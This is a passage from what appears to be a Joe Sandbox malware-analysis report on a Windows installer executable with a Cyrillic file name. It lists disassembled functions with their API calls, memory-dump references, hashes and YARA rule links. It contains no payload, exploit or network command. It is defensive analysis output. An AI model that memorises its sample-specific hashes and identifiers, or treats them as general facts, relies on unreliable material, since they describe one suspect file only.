                                                                                                                                                                                                                    • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                                                    • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                                                    • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406B15 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                    • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                    • String ID: Call$N$gC@
                                                                                                                                                                                                                    • API String ID: 3103080414-2733886405
                                                                                                                                                                                                                    • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                    • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,Grundlovssikrende36 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                    • String ID: F$Grundlovssikrende36 Setup
                                                                                                                                                                                                                    • API String ID: 941294808-2845570667
                                                                                                                                                                                                                    • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                    • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                                                                                    • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                                                    • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 0040654E
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                                                                                                    • *?|<>/":, xrefs: 004065A0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                    • API String ID: 589700163-3539824888
                                                                                                                                                                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                    • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                    • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405322 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                                                    • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                    Memory Dump Source
